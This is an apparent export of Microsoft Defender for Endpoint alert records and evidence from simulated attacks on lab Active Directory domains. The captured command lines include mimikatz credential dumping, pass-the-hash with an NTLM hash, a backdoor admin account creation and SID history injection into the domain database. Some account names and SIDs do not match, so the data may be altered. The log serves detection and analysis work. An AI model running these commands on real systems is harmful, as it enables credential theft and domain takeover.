"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-12-22T08:48:46.11Z",
"fileName": "Get-KRBTicket.ps1",
"filePath": "C:\\M365DAttack",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "9aa7209078444816586eb3250320e09bfe69f0e4",
"sha256": "0e4975d3607ce298a1a450aa3104ef8085e007f304b6ceb04c4961e2a9fda05f",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:48:46.11Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T08:47:11.8139068Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 6324,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv8.m365dpoc.com /run:\\\"powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1\\\"\" exit -Wait",
"processCreationTime": "2022-12-22T08:47:28.9856445Z",
"processId": 10120,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-09-30T06:14:52.4166667Z | Suspicious | None | jeff | vpn.zone | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-09-30T06:14:33.3733333Z | Suspicious | None | admin | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1111 | 89b6fc86-af84-47b2-a72d-325362598b2c | ronhd@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-22T08:48:30.2433333Z | Suspicious | None | svc_acct | MSDXV8 | S-1-5-21-2159906967-4174806019-1002223092-1104 | null | jeff@msdxv8.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638045935112835331_1703441138 | b4f9432b-672b-474a-b166-2355402c25c3 | 765 | MicrosoftDefenderForEndpoint | 2022-11-21T02:11:51.283555Z | 2022-11-21T02:36:06.49Z | null | 2022-11-21T02:07:15.8950101Z | 2022-11-21T02:34:30.3409598Z | Suspicious User Account Discovery | A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks. | Discovery | New | Low | null | UnsupportedAlertType | null | null | WindowsDefenderAtp | 9bfe28a9-21eb-4f8a-b51e-38ebd3650c88 | null | null | null | [
"T1033",
"T1087",
"T1087.001"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "NotSupported",
"deviceDnsName": "msdxv2-dc.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:27:58.906Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "Defender",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "WindowsServer2019",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "Low",
"tags": [],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-DC",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "5bc68ee9-2aaf-4b12-8045-60af8aecad6e"
}
}
] | [
{
"aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09",
"accountName": "steve",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:11:51.33Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "steve@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1107",
"verdict": "Suspicious"
},
{
"aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09",
"accountName": "steve",
"detectionStatus": "Detected",
"deviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:11:51.33Z",
"fileName": "cmd.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:07:15.1389846Z",
"parentProcessFileName": "PSEXESVC.exe",
"parentProcessFilePath": "C:\\Windows",
"parentProcessId": 7232,
"processCommandLine": "\"cmd\" /c \"net.exe user /add BDAdmin Password1! && net.exe stop ntds /y && powershell.exe -Command \"Add-ADDBSidHistory -SamAccountName BDAdmin -SidHistory \\\"S-1-5-32-544\\\" -DatabasePath (Get-ItemProperty -Path Registry::HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters).\\\"DSA Database file\\\"\" && net.exe start ntds\"",
"processCreationTime": "2022-11-21T02:07:15.6313121Z",
"processId": 3020,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "ded8fd7f36417f66eb6ada10e0c0d7c0022986e9",
"sha256": "bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527",
"url": null,
"userPrincipalName": "steve@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1107",
"verdict": "Suspicious"
},
{
"aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09",
"accountName": "steve",
"detectionStatus": "Detected",
"deviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:11:51.33Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:07:15.6313121Z",
"parentProcessFileName": "cmd.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 3020,
"processCommandLine": "net.exe user /add BDAdmin Password1! ",
"processCreationTime": "2022-11-21T02:07:15.6863696Z",
"processId": 5996,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "steve@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1107",
"verdict": "Suspicious"
},
{
"aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09",
"accountName": "steve",
"detectionStatus": "Detected",
"deviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:36:06.4233333Z",
"fileName": "cmd.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:34:15.0073785Z",
"parentProcessFileName": "PSEXESVC.exe",
"parentProcessFilePath": "C:\\Windows",
"parentProcessId": 6984,
"processCommandLine": "\"cmd\" /c \"net.exe user /add BDAdmin Password1! && net.exe stop ntds /y && powershell.exe -Command \"Add-ADDBSidHistory -SamAccountName BDAdmin -SidHistory \\\"S-1-5-32-544\\\" -DatabasePath (Get-ItemProperty -Path Registry::HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters).\\\"DSA Database file\\\"\" && net.exe start ntds\"",
"processCreationTime": "2022-11-21T02:34:15.4789089Z",
"processId": 4960,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "ded8fd7f36417f66eb6ada10e0c0d7c0022986e9",
"sha256": "bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527",
"url": null,
"userPrincipalName": "steve@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1107",
"verdict": "Suspicious"
},
{
"aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09",
"accountName": "steve",
"detectionStatus": "Detected",
"deviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:36:06.4233333Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:34:15.4789089Z",
"parentProcessFileName": "cmd.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 4960,
"processCommandLine": "net.exe user /add BDAdmin Password1! ",
"processCreationTime": "2022-11-21T02:34:15.5232143Z",
"processId": 6372,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "steve@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1107",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-18T04:50:04.1566667Z | Suspicious | None | analyst | TMTOWER-BOOK | S-1-5-21-7316772-2057538409-3008203053-1001 | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638072958901178850_854105446 | 766741b8-ab80-4e7f-93ef-f784f118ab27 | 975 | MicrosoftDefenderForEndpoint | 2022-12-22T08:51:30.1179047Z | 2022-12-22T08:59:22.7233333Z | null | 2022-12-22T08:26:21.6761079Z | 2022-12-22T08:47:34.3612687Z | 'Kekeo' malware was detected during lateral movement | 'DefenderObservation.ThreatFamily' malware was detected on this device. An attacker might be attempting to move laterally to this device from another device on the network. | LateralMovement | New | Medium | 61 | PendingApproval | null | null | WindowsDefenderAtp | 7a6f0432-57d7-4a96-a286-0bd733ea425d | null | null | null | [
"T1021.001",
"T1078"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv8-win10v.msdxv8.m365dpoc.com",
"firstSeen": "2022-12-08T05:21:19.944Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV8"
}
],
"mdatpDeviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "None",
"tags": [],
"version": "1809",
"vmMetadata": null
}
] | [
{
"aadUserId": null,
"accountName": "MSDXV8-Win10V$",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV8",
"entityType": "User",
"evidenceCreationTime": "2022-12-22T08:51:30.1466667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV8",
"entityType": "User",
"evidenceCreationTime": "2022-12-22T08:51:30.1466667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-12-22T08:51:30.1466667Z",
"fileName": "Rubeus.exe",
"filePath": "C:\\M365DAttack\\Rubeus",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "PendingApproval",
"remediationStatusDetails": null,
"sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7",
"sha256": "a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Malicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Ip",
"evidenceCreationTime": "2022-12-22T08:51:30.1466667Z",
"fileName": null,
"filePath": null,
"ipAddress": "10.0.1.5",
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-12-22T08:59:22.5666667Z",
"fileName": "Rubeus.exe",
"filePath": "C:\\M365DAttack\\Rubeus",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7",
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638045935057781645_-1319376665 | d37ca336-64d0-434f-adbd-10633720781f | 765 | MicrosoftDefenderForEndpoint | 2022-11-21T02:11:45.7781854Z | 2022-11-21T02:22:37.63Z | 2022-11-21T02:22:37.4745033Z | 2022-11-21T02:07:28.8498674Z | 2022-11-21T02:07:30.4523875Z | SID history injection | A Security IDentifcation (SID) history injection was detected on this device. SID history is an attribute that supports migration scenarios. Attackers typically use attack tools to change the SID history of an existing domain user to an SID with elevated privileges. With elevated privileges, the affected process might be able to access sensitive files, ensure persistence, and modify system settings. | PrivilegeEscalation | Resolved | Medium | 51 | Benign | null | null | WindowsDefenderAtp | f9448527-19db-4a4d-90e7-e9279c3e77b9 | null | Barium | null | [
"T1134.005"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "NotSupported",
"deviceDnsName": "msdxv2-dc.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:27:58.906Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "Defender",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "WindowsServer2019",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "High",
"tags": [],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-DC",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "5bc68ee9-2aaf-4b12-8045-60af8aecad6e"
}
}
] | [
{
"aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09",
"accountName": "steve",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:11:45.81Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "steve@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1107",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-21T02:11:45.81Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Clean"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638071952904716240_-1942787998 | 6aeefec7-8396-4af3-bfb6-c07abf1ec025 | 970 | MicrosoftDefenderForEndpoint | 2022-12-21T04:54:50.4716495Z | 2022-12-21T04:58:53.4333333Z | null | 2022-12-21T04:51:27.4606616Z | 2022-12-21T04:51:27.6322575Z | Connection to a custom network indicator | An endpoint has connected to a URL or domain in your list of custom indicators. | CommandAndControl | New | Informational | null | UnsupportedAlertType | null | null | CustomerTI | 08dfd06f-d2e2-4049-899f-67b406311d84 | null | null | null | [] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv8-win10b.msdxv8.m365dpoc.com",
"firstSeen": "2022-12-08T01:04:21.9057174Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "steve",
"domainName": "MSDXV8"
}
],
"mdatpDeviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "Medium",
"tags": [],
"version": "21H1",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV8/providers/Microsoft.Compute/virtualMachines/MSDXV8-Win10B",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "97e5e58b-3d5e-4bfe-8e40-a88b49deff08"
}
}
] | [
{
"aadUserId": null,
"accountName": "steve",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV8",
"entityType": "User",
"evidenceCreationTime": "2022-12-21T04:54:51.0633333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "steve@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1107",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Url",
"evidenceCreationTime": "2022-12-21T04:54:51.0633333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": "www.espn.com",
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Url",
"evidenceCreationTime": "2022-12-21T04:54:51.0633333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": "https://www.espn.com/",
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-09-30T06:14:52.89Z | Suspicious | None | user1 | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-22T09:30:44.15Z | Suspicious | None | operator | MSDXV8 | S-1-5-21-2159906967-4174806019-1002223092-1104 | null | jeff@msdxv8.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-18T05:13:00.6633333Z | Benign | None | jeff | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-21T02:03:44.8266667Z | Suspicious | Active | user1 | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | 6cbce4a295c163791b60fc23d285e6d84f28ee4c | de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | 11,616 | powershell.exe C:\M365DAttack\Get-KRBTicket.ps1 | 2022-11-21T02:01:44.3957302Z | null | null | null | null | Detected | c7e147cb0eb3534a4dcea5acb8e61c933713b145 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-22T08:48:24.5566667Z | Benign | None | jeff | MSDXV8 | S-1-5-21-2159906967-4174806019-1002223092-1104 | null | jeff@msdxv8.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-09-30T06:20:01.6733333Z | Suspicious | Active | svc_acct | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | 70df765f554ed7392200422c18776b8992c09231 | 912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9 | mimikatz.exe | C:\M365DAttack\Mimikatz\x64 | 2,596 | "mimikatz.exe" privilege::debug sekurlsa::logonpasswords exit | 2022-09-30T06:11:52.7127433Z | 4,064 | 2022-09-30T06:11:13.210308Z | powershell.exe | \Device\HarddiskVolume4\Windows\System32\WindowsPowerShell\v1.0 | Detected | c7e147cb0eb3534a4dcea5acb8e61c933713b145 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-09-30T06:14:45.81Z | Suspicious | None | hacker | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | 6cbce4a295c163791b60fc23d285e6d84f28ee4c | de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | 4,064 | "powershell.exe" | 2022-09-30T06:11:13.210308Z | 4,668 | 2022-08-23T12:17:37.8693453Z | explorer.exe | C:\Windows | Detected | c7e147cb0eb3534a4dcea5acb8e61c933713b145 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-11T08:28:42.99Z | Suspicious | None | alice | null | S-1-5-21-2300221942-1987151257-321556088-1104 | null | null | 70df765f554ed7392200422c18776b8992c09231 | 912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9 | mimikatz.exe | 816 | "mimikatz.exe" privilege::debug "sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\"powershell.exe dir \\msdxv2-win10b\C$ >> C:\M365DAttack\Step3-PasstheHash.txt\"" exit | 2022-11-11T08:17:06.6760783Z | 4,704 | 2022-11-11T08:16:44.2952776Z | null | null | null | null | |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-12-22T09:02:48.4133333Z | Suspicious | None | alice | MSDXV8 | S-1-5-21-2159906967-4174806019-1002223092-1104 | null | jeff@msdxv8.m365dpoc.com | 70df765f554ed7392200422c18776b8992c09231 | 912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9 | mimikatz.exe | C:\M365DAttack\Mimikatz\x64 | 7,772 | "mimikatz.exe" privilege::debug sekurlsa::logonpasswords exit | 2022-12-22T08:47:23.3350389Z | 6,324 | 2022-12-22T08:47:11.8139068Z | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | Detected | 7ba8aa008687dd62d639cb45b52c7c9f971c65c1 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-14T08:32:01.7933333Z | Suspicious | None | alice | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
